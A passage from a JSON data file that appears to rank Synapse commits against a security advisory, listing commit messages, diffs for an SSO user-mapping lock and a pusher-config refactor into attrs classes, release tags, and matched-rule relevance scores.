b/synapse/handlers/sso.py", + "@@ -24,2 +24,3 @@ from synapse.http.server import respond_with_html", + " from synapse.types import UserID, contains_invalid_mxid_characters", + "+from synapse.util.async_helpers import Linearizer", + "@@ -56,2 +57,5 @@ class SsoHandler:", + "+ # a lock on the mappings", + "+ self._mapping_lock = Linearizer(name=\"sso_user_mapping\", clock=hs.get_clock())", + "+", + " def render_error(", + "@@ -174,20 +178,34 @@ class SsoHandler:", + " \"\"\"", + "- # first of all, check if we already have a mapping for this user", + "- previously_registered_user_id = await self.get_sso_user_by_remote_user_id(", + "- auth_provider_id, remote_user_id,", + "- )", + "- if previously_registered_user_id:", + "- return previously_registered_user_id", + "-", + "- # Check for grandfathering of users.", + "- if grandfather_existing_users:", + "- previously_registered_user_id = await grandfather_existing_users()", + "+ # grab a lock while we try to find a mapping for this user. This seems...", + "+ # optimistic, especially for implementations that end up redirecting to", + "+ # interstitial pages.", + "+ with await self._mapping_lock.queue(auth_provider_id):", + "+ # first of all, check if we already have a mapping for this user", + "+ previously_registered_user_id = await self.get_sso_user_by_remote_user_id(", + "+ auth_provider_id, remote_user_id,", + "+ )", + " if previously_registered_user_id:", + "- # Future logins should also match this user ID.", + "- await self._store.record_user_external_id(", + "- auth_provider_id, remote_user_id, previously_registered_user_id", + "- )", + " return previously_registered_user_id", + "- # Otherwise, generate a new user.", + "+ # Check for grandfathering of users.", + "+ if grandfather_existing_users:", + "+ previously_registered_user_id = await grandfather_existing_users()", + "+ if previously_registered_user_id:", + "+ # Future logins should also match this user ID.", + "+ await self._store.record_user_external_id(", + "+ auth_provider_id, remote_user_id, previously_registered_user_id", + "+ )", + "+ return previously_registered_user_id", + "+", + "+ # Otherwise, generate a new user.", + "+ attributes = await self._call_attribute_mapper(sso_to_matrix_id_mapper)", + "+ user_id = await self._register_mapped_user(", + "+ attributes, auth_provider_id, remote_user_id, user_agent, ip_address,", + "+ )", + "+ return user_id", + "+", + "+ async def _call_attribute_mapper(", + "+ self, sso_to_matrix_id_mapper: Callable[[int], Awaitable[UserAttributes]],", + "+ ) -> UserAttributes:", + "+ \"\"\"Call the attribute mapper function in a loop, until we get a unique userid\"\"\"", + " for i in range(self._MAP_USERNAME_RETRIES):", + "@@ -229,3 +247,12 @@ class SsoHandler:", + " )", + "+ return attributes", + "+ async def _register_mapped_user(", + "+ self,", + "+ attributes: UserAttributes,", + "+ auth_provider_id: str,", + "+ remote_user_id: str,", + "+ user_agent: str,", + "+ ip_address: str,", + "+ ) -> str:", + " # Since the localpart is provided via a potentially untrusted module," + ], + "changed_files": [ + "changelog.d/8900.feature", + "synapse/handlers/saml_handler.py", + "synapse/handlers/sso.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8900": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8900, 8900", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8900", + "relevance": 2 + } + ] + }, + { + "commit_id": "bd30cfe86a5413191fe44d8f937a00117334ea82", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608135930, + "hunks": 108, + "message": "Convert internal pusher dicts to attrs classes. (#8940) This improves type hinting and should use less memory.", + "diff": [ + "diff --git a/changelog.d/8940.misc b/changelog.d/8940.misc", + "new file mode 100644", + "index 000000000..4ff0b94b9", + "--- /dev/null", + "+++ b/changelog.d/8940.misc", + "@@ -0,0 +1 @@", + "+Add type hints to push module.", + "diff --git a/mypy.ini b/mypy.ini", + "index 334e3a22f..190420402 100644", + "--- a/mypy.ini", + "+++ b/mypy.ini", + "@@ -67,2 +67,3 @@ files =", + " synapse/storage/databases/main/events.py,", + "+ synapse/storage/databases/main/pusher.py,", + " synapse/storage/databases/main/registration.py,", + "diff --git a/synapse/push/__init__.py b/synapse/push/__init__.py", + "index ad07ee86f..9e7ac149a 100644", + "--- a/synapse/push/__init__.py", + "+++ b/synapse/push/__init__.py", + "@@ -16,5 +16,7 @@", + " import abc", + "-from typing import TYPE_CHECKING, Any, Dict", + "+from typing import TYPE_CHECKING, Any, Dict, Optional", + "-from synapse.types import RoomStreamToken", + "+import attr", + "+", + "+from synapse.types import JsonDict, RoomStreamToken", + "@@ -24,4 +26,46 @@ if TYPE_CHECKING:", + "+@attr.s(slots=True)", + "+class PusherConfig:", + "+ \"\"\"Parameters necessary to configure a pusher.\"\"\"", + "+", + "+ id = attr.ib(type=Optional[str])", + "+ user_name = attr.ib(type=str)", + "+ access_token = attr.ib(type=Optional[int])", + "+ profile_tag = attr.ib(type=str)", + "+ kind = attr.ib(type=str)", + "+ app_id = attr.ib(type=str)", + "+ app_display_name = attr.ib(type=str)", + "+ device_display_name = attr.ib(type=str)", + "+ pushkey = attr.ib(type=str)", + "+ ts = attr.ib(type=int)", + "+ lang = attr.ib(type=Optional[str])", + "+ data = attr.ib(type=Optional[JsonDict])", + "+ last_stream_ordering = attr.ib(type=Optional[int])", + "+ last_success = attr.ib(type=Optional[int])", + "+ failing_since = attr.ib(type=Optional[int])", + "+", + "+ def as_dict(self) -> Dict[str, Any]:", + "+ \"\"\"Information that can be retrieved about a pusher after creation.\"\"\"", + "+ return {", + "+ \"app_display_name\": self.app_display_name,", + "+ \"app_id\": self.app_id,", + "+ \"data\": self.data,", + "+ \"device_display_name\": self.device_display_name,", + "+ \"kind\": self.kind,", + "+ \"lang\": self.lang,", + "+ \"profile_tag\": self.profile_tag,", + "+ \"pushkey\": self.pushkey,", + "+ }", + "+", + "+", + "+@attr.s(slots=True)", + "+class ThrottleParams:", + "+ \"\"\"Parameters for controlling the rate of sending pushes via email.\"\"\"", + "+", + "+ last_sent_ts = attr.ib(type=int)", + "+ throttle_ms = attr.ib(type=int)", + "+", + "+", + " class Pusher(metaclass=abc.ABCMeta):", + "- def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any]):", + "+ def __init__(self, hs: \"HomeServer\", pusher_config: PusherConfig):", + " self.hs = hs", + "@@ -30,6 +74,8 @@ class Pusher(metaclass=abc.ABCMeta):", + "- self.pusher_id = pusherdict[\"id\"]", + "- self.user_id = pusherdict[\"user_name\"]", + "- self.app_id = pusherdict[\"app_id\"]", + "- self.pushkey = pusherdict[\"pushkey\"]", + "+ self.pusher_id = pusher_config.id", + "+ self.user_id = pusher_config.user_name", + "+ self.app_id = pusher_config.app_id", + "+ self.pushkey = pusher_config.pushkey", + "+", + "+ self.last_stream_ordering = pusher_config.last_stream_ordering", + "diff --git a/synapse/push/emailpusher.py b/synapse/push/emailpusher.py", + "index 11a97b8df..d2eff75a5 100644", + "--- a/synapse/push/emailpusher.py", + "+++ b/synapse/push/emailpusher.py", + "@@ -16,3 +16,3 @@", + " import logging", + "-from typing import TYPE_CHECKING, Any, Dict, List, Optional", + "+from typing import TYPE_CHECKING, Dict, List, Optional", + "@@ -22,3 +22,3 @@ from twisted.internet.error import AlreadyCalled, AlreadyCancelled", + " from synapse.metrics.background_process_metrics import run_as_background_process", + "-from synapse.push import Pusher", + "+from synapse.push import Pusher, PusherConfig, ThrottleParams", + " from synapse.push.mailer import Mailer", + "@@ -62,4 +62,4 @@ class EmailPusher(Pusher):", + "- def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any], mailer: Mailer):", + "- super().__init__(hs, pusherdict)", + "+ def __init__(self, hs: \"HomeServer\", pusher_config: PusherConfig, mailer: Mailer):", + "+ super().__init__(hs, pusher_config)", + " self.mailer = mailer", + "@@ -67,6 +67,5 @@ class EmailPusher(Pusher):", + " self.store = self.hs.get_datastore()", + "- self.email = pusherdict[\"pushkey\"]", + "- self.last_stream_ordering = pusherdict[\"last_stream_ordering\"]", + "+ self.email = pusher_config.pushkey", + " self.timed_call = None # type: Optional[DelayedCall]", + "- self.throttle_params = {} # type: Dict[str, Dict[str, int]]", + "+ self.throttle_params = {} # type: Dict[str, ThrottleParams]", + " self._inited = False", + "@@ -134,2 +133,3 @@ class EmailPusher(Pusher):", + " # this is our first loop: load up the throttle params", + "+ assert self.pusher_id is not None", + " self.throttle_params = await self.store.get_throttle_params_by_room(", + "@@ -159,2 +159,3 @@ class EmailPusher(Pusher):", + " start = 0 if INCLUDE_ALL_UNREAD_NOTIFS else self.last_stream_ordering", + "+ assert start is not None", + " unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_email(", + "@@ -246,3 +247,3 @@ class EmailPusher(Pusher):", + " if room_id in self.throttle_params:", + "- return self.throttle_params[room_id][\"throttle_ms\"]", + "+ return self.throttle_params[room_id].throttle_ms", + " else:", + "@@ -252,3 +253,3 @@ class EmailPusher(Pusher):", + " if room_id in self.throttle_params:", + "- return self.throttle_params[room_id][\"last_sent_ts\"]", + "+ return self.throttle_params[room_id].last_sent_ts", + " else:", + "@@ -303,6 +304,6 @@ class EmailPusher(Pusher):", + " )", + "- self.throttle_params[room_id] = {", + "- \"last_sent_ts\": self.clock.time_msec(),", + "- \"throttle_ms\": new_throttle_ms,", + "- }", + "+ self.throttle_params[room_id] = ThrottleParams(", + "+ self.clock.time_msec(), new_throttle_ms,", + "+ )", + "+ assert self.pusher_id is not None", + " await self.store.set_throttle_params(", + "diff --git a/synapse/push/httppusher.py b/synapse/push/httppusher.py", + "index e8b25bcd2..417fe0f1f 100644", + "--- a/synapse/push/httppusher.py", + "+++ b/synapse/push/httppusher.py", + "@@ -27,3 +27,3 @@ from synapse.logging import opentracing", + " from synapse.metrics.background_process_metrics import run_as_background_process", + "-from synapse.push import Pusher, PusherConfigException", + "+from synapse.push import Pusher, PusherConfig, PusherConfigException", + "@@ -64,12 +64,11 @@ class HttpPusher(Pusher):", + "- def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any]):", + "- super().__init__(hs, pusherdict)", + "+ def __init__(self, hs: \"HomeServer\", pusher_config: PusherConfig):", + "+ super().__init__(hs, pusher_config)", + " self.storage = self.hs.get_storage()", + "- self.app_display_name = pusherdict[\"app_display_name\"]", + "- self.device_display_name = pusherdict[\"device_display_name\"]", + "- self.pushkey_ts = pusherdict[\"ts\"]", + "- self.data = pusherdict[\"data\"]", + "- self.last_stream_ordering = pusherdict[\"last_stream_ordering\"]", + "+ self.app_display_name = pusher_config.app_display_name", + "+ self.device_display_name = pusher_config.device_display_name", + "+ self.pushkey_ts = pusher_config.ts", + "+ self.data = pusher_config.data", + " self.backoff_delay = HttpPusher.INITIAL_BACKOFF_SEC", + "- self.failing_since = pusherdict[\"failing_since\"]", + "+ self.failing_since = pusher_config.failing_since", + " self.timed_call = None", + "@@ -78,15 +77,12 @@ class HttpPusher(Pusher):", + "- if \"data\" not in pusherdict:", + "- raise PusherConfigException(\"No 'data' key for HTTP pusher\")", + "- self.data = pusherdict[\"data\"]", + "+ self.data = pusher_config.data", + "+ if self.data is None:", + "+ raise PusherConfigException(\"'data' key can not be null for HTTP pusher\")", + " self.name = \"%s/%s/%s\" % (", + "- pusherdict[\"user_name\"],", + "- pusherdict[\"app_id\"],", + "- pusherdict[\"pushkey\"],", + "+ pusher_config.user_name,", + "+ pusher_config.app_id,", + "+ pusher_config.pushkey,", + " )", + "- if self.data is None:", + "- raise PusherConfigException(\"data can not be null for HTTP pusher\")", + "-", + " # Validate that there's a URL and it is of the proper form.", + "@@ -182,2 +178,3 @@ class HttpPusher(Pusher):", + " \"\"\"", + "+ assert self.last_stream_ordering is not None", + " unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_http(", + "@@ -210,2 +207,3 @@ class HttpPusher(Pusher):", + " self.last_stream_ordering = push_action[\"stream_ordering\"]", + "+ assert self.last_stream_ordering is not None", + " pusher_still_exists = await self.store.update_pusher_last_stream_ordering_and_success(", + "@@ -316,2 +314,4 @@ class HttpPusher(Pusher):", + "+ # This was checked in the __init__, but mypy doesn't seem to know that.", + "+ assert self.data is not None", + " if self.data.get(\"format\") == \"event_id_only\":", + "diff --git a/synapse/push/pusher.py b/synapse/push/pusher.py", + "index 8f1072b09..2aa7918fb 100644", + "--- a/synapse/push/pusher.py", + "+++ b/synapse/push/pusher.py", + "@@ -16,5 +16,5 @@", + " import logging", + "-from typing import TYPE_CHECKING, Any, Callable, Dict, Optional", + "+from typing import TYPE_CHECKING, Callable, Dict, Optional", + "-from synapse.push import Pusher", + "+from synapse.push import Pusher, PusherConfig", + " from synapse.push.emailpusher import EmailPusher", + "@@ -36,3 +36,3 @@ class PusherFactory:", + " \"http\": HttpPusher", + "- } # type: Dict[str, Callable[[HomeServer, dict], Pusher]]", + "+ } # type: Dict[str, Callable[[HomeServer, PusherConfig], Pusher]]", + "@@ -49,4 +49,4 @@ class PusherFactory:", + "- def create_pusher(self, pusherdict: Dict[str, Any]) -> Optional[Pusher]:", + "- kind = pusherdict[\"kind\"]", + "+ def create_pusher(self, pusher_config: PusherConfig) -> Optional[Pusher]:", + "+ kind = pusher_config.kind", + " f = self.pusher_types.get(kind, None)", + "@@ -54,9 +54,9 @@ class PusherFactory:", + " return None", + "- logger.debug(\"creating %s pusher for %r\", kind, pusherdict)", + "- return f(self.hs, pusherdict)", + "+ logger.debug(\"creating %s pusher for %r\", kind, pusher_config)", + "+ return f(self.hs, pusher_config)", + " def _create_email_pusher(", + "- self, _hs: \"HomeServer\", pusherdict: Dict[str, Any]", + "+ self, _hs: \"HomeServer\", pusher_config: PusherConfig", + " ) -> EmailPusher:", + "- app_name = self._app_name_from_pusherdict(pusherdict)", + "+ app_name = self._app_name_from_pusherdict(pusher_config)", + " mailer = self.mailers.get(app_name)", + "@@ -70,6 +70,6 @@ class PusherFactory:", + " self.mailers[app_name] = mailer", + "- return EmailPusher(self.hs, pusherdict, mailer)", + "+ return EmailPusher(self.hs, pusher_config, mailer)", + "- def _app_name_from_pusherdict(self, pusherdict: Dict[str, Any]) -> str:", + "- data = pusherdict[\"data\"]", + "+ def _app_name_from_pusherdict(self, pusher_config: PusherConfig) -> str:", + "+ data = pusher_config.data", + "diff --git a/synapse/push/pusherpool.py b/synapse/push/pusherpool.py", + "index 9c12d81cf..8158356d4 100644", + "--- a/synapse/push/pusherpool.py", + "+++ b/synapse/push/pusherpool.py", + "@@ -17,3 +17,3 @@", + " import logging", + "-from typing import TYPE_CHECKING, Any, Dict, Optional", + "+from typing import TYPE_CHECKING, Dict, Iterable, Optional", + "@@ -25,5 +25,5 @@ from synapse.metrics.background_process_metrics import (", + " )", + "-from synapse.push import Pusher, PusherConfigException", + "+from synapse.push import Pusher, PusherConfig, PusherConfigException", + " from synapse.push.pusher import PusherFactory", + "-from synapse.types import RoomStreamToken", + "+from synapse.types import JsonDict, RoomStreamToken", + " from synapse.util.async_helpers import concurrently_execute", + "@@ -79,3 +79,3 @@ class PusherPool:", + "- def start(self):", + "+ def start(self) -> None:", + " \"\"\"Starts the pushers off in a background process.", + "@@ -89,12 +89,12 @@ class PusherPool:", + " self,", + "- user_id,", + "- access_token,", + "- kind,", + "- app_id,", + "- app_display_name,", + "- device_display_name,", + "- pushkey,", + "- lang,", + "- data,", + "- profile_tag=\"\",", + "+ user_id: str,", + "+ access_token: Optional[int],", + "+ kind: str,", + "+ app_id: str,", + "+ app_display_name: str,", + "+ device_display_name: str,", + "+ pushkey: str,", + "+ lang: Optional[str],", + "+ data: JsonDict,", + "+ profile_tag: str = \"\",", + " ) -> Optional[Pusher]:", + "@@ -113,17 +113,19 @@ class PusherPool:", + " self.pusher_factory.create_pusher(", + "- {", + "- \"id\": None,", + "- \"user_name\": user_id,", + "- \"kind\": kind,", + "- \"app_id\": app_id,", + "- \"app_display_name\": app_display_name,", + "- \"device_display_name\": device_display_name,", + "- \"pushkey\": pushkey,", + "- \"ts\": time_now_msec,", + "- \"lang\": lang,", + "- \"data\": data,", + "- \"last_stream_ordering\": None,", + "- \"last_success\": None,", + "- \"failing_since\": None,", + "- }", + "+ PusherConfig(", + "+ id=None,", + "+ user_name=user_id,", + "+ access_token=access_token,", + "+ profile_tag=profile_tag,", + "+ kind=kind,", + "+ app_id=app_id,", + "+ app_display_name=app_display_name,", + "+ device_display_name=device_display_name,", + "+ pushkey=pushkey,", + "+ ts=time_now_msec,", + "+ lang=lang,", + "+ data=data,", + "+ last_stream_ordering=None,", + "+ last_success=None,", + "+ failing_since=None,", + "+ )", + " )", + "@@ -153,7 +155,7 @@ class PusherPool:", + " async def remove_pushers_by_app_id_and_pushkey_not_user(", + "- self, app_id, pushkey, not_user_id", + "- ):", + "+ self, app_id: str, pushkey: str, not_user_id: str", + "+ ) -> None:", + " to_remove = await self.store.get_pushers_by_app_id_and_pushkey(app_id, pushkey)", + " for p in to_remove:", + "- if p[\"user_name\"] != not_user_id:", + "+ if p.user_name != not_user_id:", + " logger.info(", + "@@ -162,7 +164,9 @@ class PusherPool:", + " pushkey,", + "- p[\"user_name\"],", + "+ p.user_name,", + " )", + "- await self.remove_pusher(p[\"app_id\"], p[\"pushkey\"], p[\"user_name\"])", + "+ await self.remove_pusher(p.app_id, p.pushkey, p.user_name)", + "- async def remove_pushers_by_access_token(self, user_id, access_tokens):", + "+ async def remove_pushers_by_access_token(", + "+ self, user_id: str, access_tokens: Iterable[int]", + "+ ) -> None:", + " \"\"\"Remove the pushers for a given user corresponding to a set of", + "@@ -171,5 +175,4 @@ class PusherPool:", + " Args:", + "- user_id (str): user to remove pushers for", + "- access_tokens (Iterable[int]): access token *ids* to remove pushers", + "- for", + "+ user_id: user to remove pushers for", + "+ access_tokens: access token *ids* to remove pushers for", + " \"\"\"", + "@@ -180,12 +183,12 @@ class PusherPool:", + " for p in await self.store.get_pushers_by_user_id(user_id):", + "- if p[\"access_token\"] in tokens:", + "+ if p.access_token in tokens:", + " logger.info(", + " \"Removing pusher for app id %s, pushkey %s, user %s\",", + "- p[\"app_id\"],", + "- p[\"pushkey\"],", + "- p[\"user_name\"],", + "+ p.app_id,", + "+ p.pushkey,", + "+ p.user_name,", + " )", + "- await self.remove_pusher(p[\"app_id\"], p[\"pushkey\"], p[\"user_name\"])", + "+ await self.remove_pusher(p.app_id, p.pushkey, p.user_name)", + "- def on_new_notifications(self, max_token: RoomStreamToken):", + "+ def on_new_notifications(self, max_token: RoomStreamToken) -> None:", + " if not self.pushers:", + "@@ -208,3 +211,3 @@ class PusherPool:", + " @wrap_as_background_process(\"on_new_notifications\")", + "- async def _on_new_notifications(self, max_token: RoomStreamToken):", + "+ async def _on_new_notifications(self, max_token: RoomStreamToken) -> None:", + " # We just use the minimum stream ordering and ignore the vector clock", + "@@ -238,3 +241,5 @@ class PusherPool:", + "- async def on_new_receipts(self, min_stream_id, max_stream_id, affected_room_ids):", + "+ async def on_new_receipts(", + "+ self, min_stream_id: int, max_stream_id: int, affected_room_ids: Iterable[str]", + "+ ) -> None:", + " if not self.pushers:", + "@@ -282,10 +287,10 @@ class PusherPool:", + "- pusher_dict = None", + "+ pusher_config = None", + " for r in resultlist:", + "- if r[\"user_name\"] == user_id:", + "- pusher_dict = r", + "+ if r.user_name == user_id:", + "+ pusher_config = r", + " pusher = None", + "- if pusher_dict:", + "- pusher = await self._start_pusher(pusher_dict)", + "+ if pusher_config:", + "+ pusher = await self._start_pusher(pusher_config)", + "@@ -304,3 +309,3 @@ class PusherPool:", + "- async def _start_pusher(self, pusherdict: Dict[str, Any]) -> Optional[Pusher]:", + "+ async def _start_pusher(self, pusher_config: PusherConfig) -> Optional[Pusher]:", + " \"\"\"Start the given pusher", + "@@ -308,3 +313,3 @@ class PusherPool:", + " Args:", + "- pusherdict: dict with the values pulled from the db table", + "+ pusher_config: The pusher configuration with the values pulled from the db table", + "@@ -314,3 +319,3 @@ class PusherPool:", + " if not self._pusher_shard_config.should_handle(", + "- self._instance_name, pusherdict[\"user_name\"]", + "+ self._instance_name, pusher_config.user_name", + " ):", + "@@ -319,3 +324,3 @@ class PusherPool:", + " try:", + "- p = self.pusher_factory.create_pusher(pusherdict)", + "+ p = self.pusher_factory.create_pusher(pusher_config)", + " except PusherConfigException as e:", + "@@ -323,6 +328,6 @@ class PusherPool:", + " \"Pusher incorrectly configured id=%i, user=%s, appid=%s, pushkey=%s: %s\",", + "- pusherdict[\"id\"],", + "- pusherdict.get(\"user_name\"),", + "- pusherdict.get(\"app_id\"),", + "- pusherdict.get(\"pushkey\"),", + "+ pusher_config.id,", + "+ pusher_config.user_name,", + "+ pusher_config.app_id,", + "+ pusher_config.pushkey,", + " e,", + "@@ -332,3 +337,3 @@ class PusherPool:", + " logger.exception(", + "- \"Couldn't start pusher id %i: caught Exception\", pusherdict[\"id\"],", + "+ \"Couldn't start pusher id %i: caught Exception\", pusher_config.id,", + " )", + "@@ -339,5 +344,5 @@ class PusherPool:", + "- appid_pushkey = \"%s:%s\" % (pusherdict[\"app_id\"], pusherdict[\"pushkey\"])", + "+ appid_pushkey = \"%s:%s\" % (pusher_config.app_id, pusher_config.pushkey)", + "- byuser = self.pushers.setdefault(pusherdict[\"user_name\"], {})", + "+ byuser = self.pushers.setdefault(pusher_config.user_name, {})", + " if appid_pushkey in byuser:", + "@@ -351,4 +356,4 @@ class PusherPool:", + " # push.", + "- user_id = pusherdict[\"user_name\"]", + "- last_stream_ordering = pusherdict[\"last_stream_ordering\"]", + "+ user_id = pusher_config.user_name", + "+ last_stream_ordering = pusher_config.last_stream_ordering", + " if last_stream_ordering:", + "@@ -366,3 +371,3 @@ class PusherPool:", + "- async def remove_pusher(self, app_id, pushkey, user_id):", + "+ async def remove_pusher(self, app_id: str, pushkey: str, user_id: str) -> None:", + " appid_pushkey = \"%s:%s\" % (app_id, pushkey)", + "diff --git a/synapse/replication/slave/storage/_slaved_id_tracker.py b/synapse/replication/slave/storage/_slaved_id_tracker.py", + "index eb74903d6..0d39a93ed 100644", + "--- a/synapse/replication/slave/storage/_slaved_id_tracker.py", + "+++ b/synapse/replication/slave/storage/_slaved_id_tracker.py", + "@@ -14,3 +14,5 @@", + " # limitations under the License.", + "+from typing import List, Optional, Tuple", + "+from synapse.storage.types import Connection", + " from synapse.storage.util.id_generators import _load_current_id", + "@@ -19,12 +21,20 @@ from synapse.storage.util.id_generators import _load_current_id", + " class SlavedIdTracker:", + "- def __init__(self, db_conn, table, column, extra_tables=[], step=1):", + "+ def __init__(", + "+ self,", + "+ db_conn: Connection,", + "+ table: str,", + "+ column: str,", + "+ extra_tables: Optional[List[Tuple[str, str]]] = None,", + "+ step: int = 1,", + "+ ):", + " self.step = step", + " self._current = _load_current_id(db_conn, table, column, step)", + "- for table, column in extra_tables:", + "- self.advance(None, _load_current_id(db_conn, table, column))", + "+ if extra_tables:", + "+ for table, column in extra_tables:", + "+ self.advance(None, _load_current_id(db_conn, table, column))", + "- def advance(self, instance_name, new_id):", + "+ def advance(self, instance_name: Optional[str], new_id: int):", + " self._current = (max if self.step > 0 else min)(self._current, new_id)", + "- def get_current_token(self):", + "+ def get_current_token(self) -> int:", + " \"\"\"", + "diff --git a/synapse/replication/slave/storage/pushers.py b/synapse/replication/slave/storage/pushers.py", + "index c418730ba..045bd014d 100644", + "--- a/synapse/replication/slave/storage/pushers.py", + "+++ b/synapse/replication/slave/storage/pushers.py", + "@@ -15,2 +15,3 @@", + " # limitations under the License.", + "+from typing import TYPE_CHECKING", + "@@ -19,2 +20,3 @@ from synapse.storage.database import DatabasePool", + " from synapse.storage.databases.main.pusher import PusherWorkerStore", + "+from synapse.storage.types import Connection", + "@@ -23,7 +25,10 @@ from ._slaved_id_tracker import SlavedIdTracker", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "+", + " class SlavedPusherStore(PusherWorkerStore, BaseSlavedStore):", + "- def __init__(self, database: DatabasePool, db_conn, hs):", + "+ def __init__(self, database: DatabasePool, db_conn: Connection, hs: \"HomeServer\"):", + " super().__init__(database, db_conn, hs)", + "- self._pushers_id_gen = SlavedIdTracker(", + "+ self._pushers_id_gen = SlavedIdTracker( # type: ignore", + " db_conn, \"pushers\", \"id\", extra_tables=[(\"deleted_pushers\", \"stream_id\")]", + "@@ -31,8 +36,10 @@ class SlavedPusherStore(PusherWorkerStore, BaseSlavedStore):", + "- def get_pushers_stream_token(self):", + "+ def get_pushers_stream_token(self) -> int:", + " return self._pushers_id_gen.get_current_token()", + "- def process_replication_rows(self, stream_name, instance_name, token, rows):", + "+ def process_replication_rows(", + "+ self, stream_name: str, instance_name: str, token, rows", + "+ ) -> None:", + " if stream_name == PushersStream.NAME:", + "- self._pushers_id_gen.advance(instance_name, token)", + "+ self._pushers_id_gen.advance(instance_name, token) # type: ignore", + " return super().process_replication_rows(stream_name, instance_name, token, rows)", + "diff --git a/synapse/rest/admin/users.py b/synapse/rest/admin/users.py", + "index 88cba369f..6658c2da5 100644", + "--- a/synapse/rest/admin/users.py", + "+++ b/synapse/rest/admin/users.py", + "@@ -44,13 +44,2 @@ logger = logging.getLogger(__name__)", + 